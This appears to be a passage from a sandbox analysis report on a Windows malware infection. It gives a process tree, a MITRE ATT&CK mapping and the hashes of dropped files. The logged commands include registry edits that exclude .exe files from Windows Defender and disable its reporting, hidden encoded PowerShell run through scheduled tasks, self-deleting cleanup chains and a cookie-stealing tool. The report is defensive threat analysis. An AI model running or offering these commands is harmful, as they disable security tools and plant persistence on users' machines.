"C:\Windows\System32\cmd.exe" /c taskkill /im t5xN8B6ioDdfpRJf6isCyntE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\t5xN8B6ioDdfpRJf6isCyntE.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:1180

C:\Windows\SysWOW64\taskkill.exe
taskkill /im t5xN8B6ioDdfpRJf6isCyntE.exe /f
5⤵
- Kills process with taskkill
PID:4212

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:680

C:\Users\Admin\Pictures\Adobe Films\9ey2mXouwzaXLg9RlD5o3jbo.exe
"C:\Users\Admin\Pictures\Adobe Films\9ey2mXouwzaXLg9RlD5o3jbo.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Users\Admin\Pictures\Adobe Films\50O8cmP5d_ZXcqw1zH_vtZEp.exe
"C:\Users\Admin\Pictures\Adobe Films\50O8cmP5d_ZXcqw1zH_vtZEp.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 660
4⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 800
4⤵
PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 624
4⤵
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1220
4⤵
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1256
4⤵
PID:480

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "50O8cmP5d_ZXcqw1zH_vtZEp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\50O8cmP5d_ZXcqw1zH_vtZEp.exe" & exit
4⤵
PID:676

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "50O8cmP5d_ZXcqw1zH_vtZEp.exe" /f
5⤵
- Kills process with taskkill
PID:2164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1120
4⤵
- Suspicious use of SetThreadContext
PID:4540

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3552

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3516

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:812

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2100

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 204
3⤵
- Program crash
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596
1⤵
PID:4628

C:\Users\Admin\Pictures\Adobe Films\NIRcHNTRudugx7nWthADgbVt.exe
"C:\Users\Admin\Pictures\Adobe Films\NIRcHNTRudugx7nWthADgbVt.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 564
3⤵
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4188 -ip 4188
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4188 -ip 4188
1⤵
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4188 -ip 4188
1⤵
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4188 -ip 4188
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4188 -ip 4188
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4188 -ip 4188
1⤵
PID:3136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4188 -ip 4188
1⤵
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4188 -ip 4188
1⤵
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4188 -ip 4188
1⤵
PID:676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4188 -ip 4188
1⤵
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4188 -ip 4188
1⤵
PID:404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4188 -ip 4188
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4188 -ip 4188
1⤵
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4188 -ip 4188
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4188 -ip 4188
1⤵
PID:2168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4188 -ip 4188
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4188 -ip 4188
1⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4188 -ip 4188
1⤵
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4188 -ip 4188
1⤵
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4188 -ip 4188
1⤵
PID:3304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4188 -ip 4188
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4184 -ip 4184
1⤵
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4184 -ip 4184
1⤵
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4184 -ip 4184
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4184 -ip 4184
1⤵
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4184 -ip 4184
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4184 -ip 4184
1⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4184 -ip 4184
1⤵
PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4184 -ip 4184
1⤵
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4184 -ip 4184
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4184 -ip 4184
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4184 -ip 4184
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4184 -ip 4184
1⤵
PID:3920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4184 -ip 4184
1⤵
PID:1864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4184 -ip 4184
1⤵
PID:632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4184 -ip 4184
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4184 -ip 4184
1⤵
PID:1208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4184 -ip 4184
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2280 -ip 2280
1⤵
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2280 -ip 2280
1⤵
PID:1304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2280 -ip 2280
1⤵
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2280 -ip 2280
1⤵
PID:3256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2280 -ip 2280
1⤵
PID:3328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2280 -ip 2280
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2280 -ip 2280
1⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2280 -ip 2280
1⤵
PID:956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of SetWindowsHookEx
PID:3496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2280 -ip 2280
1⤵
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2280 -ip 2280
1⤵
PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2280 -ip 2280
1⤵
PID:1308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2280 -ip 2280
1⤵
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2280 -ip 2280
1⤵
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2280 -ip 2280
1⤵
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2280 -ip 2280
1⤵
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2280 -ip 2280
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2280 -ip 2280
1⤵
PID:1944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2280 -ip 2280
1⤵
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2280 -ip 2280
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2280 -ip 2280
1⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2280 -ip 2280
1⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2280 -ip 2280
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2280 -ip 2280
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2280 -ip 2280
1⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2280 -ip 2280
1⤵
PID:3980

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
1⤵
PID:2808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
1⤵
PID:3604

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:4216

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
3⤵
- Enumerates processes with tasklist
PID:1300

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
3⤵
PID:1244

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:1616

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
PID:4696

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
3⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
Sta.exe.pif V
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 480
5⤵
PID:2056

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 MsGxuGavEVaQbserVWhrA
3⤵
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4876 -ip 4876
1⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\7zS4483.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4576

C:\Users\Admin\AppData\Local\Temp\7zS6152.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:2364

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:4672

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:2120

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:1660

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:4456

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:5056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:4532

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:3180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfhYpcZlV" /SC once /ST 00:52:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:4136

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfhYpcZlV"
3⤵
PID:2724

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gfhYpcZlV"
3⤵
PID:5024

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\LlxaJQP.exe\" j6 /site_id 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 624
1⤵
PID:812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 456
1⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4836 -ip 4836
1⤵
PID:3192

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2560

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4836 -ip 4836
1⤵
PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5108 -ip 5108
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4876 -ip 4876
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 632
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4876 -ip 4876
1⤵
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4876 -ip 4876
1⤵
PID:3920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3828 -ip 3828
1⤵
PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4876 -ip 4876
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4876 -ip 4876
1⤵
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2568 -ip 2568
1⤵
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4876 -ip 4876
1⤵
PID:1744

C:\Windows\SysWOW64\qpudfyio\zfnvaixm.exe
C:\Windows\SysWOW64\qpudfyio\zfnvaixm.exe /d"C:\Users\Admin\emhfdsnc.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1020

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 540
2⤵
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4876 -ip 4876
1⤵
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:576

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1020 -ip 1020
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:956

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2280 -ip 2280
1⤵
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2280 -ip 2280
1⤵
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1912 -ip 1912
1⤵
PID:4340

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
72f7c962237877d327913a1e4d6f3341

SHA1
bdcfdeee402f3be554a0108dee00b701dc49049f

SHA256
37537cb636d02f8e3fb6bd60df2f9b53beb1587d586096f98c39cfb2cb9b42f5

SHA512
683b5dcef23f786e1e697cf460a278aa3c813364ced86fae5dbb6f6c833239c105317f5ab97db9f33c0d6f50232fde87f227c897dba713591e3a9bca8e85eb98

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
ffa10b8f567a3594efeb6bafe7d10dde

SHA1
88248fa822a13bffdb51aafb160df3aed75b8e3d

SHA256
fd4c09eb1e21efd0c49f12f68a77aa91051a7e272bc819c13094c52c3fe27ef0

SHA512
b3c7c71c0ffd17e9bf0e575016e96243d25d4a696a5e3236f564d6c27aaef1a91b68d82ccdafcb5b429e354a9656da309be1a9e0049dc966d40b990efc7d3f82

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
ffa10b8f567a3594efeb6bafe7d10dde

SHA1
88248fa822a13bffdb51aafb160df3aed75b8e3d

SHA256
fd4c09eb1e21efd0c49f12f68a77aa91051a7e272bc819c13094c52c3fe27ef0

SHA512
b3c7c71c0ffd17e9bf0e575016e96243d25d4a696a5e3236f564d6c27aaef1a91b68d82ccdafcb5b429e354a9656da309be1a9e0049dc966d40b990efc7d3f82

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
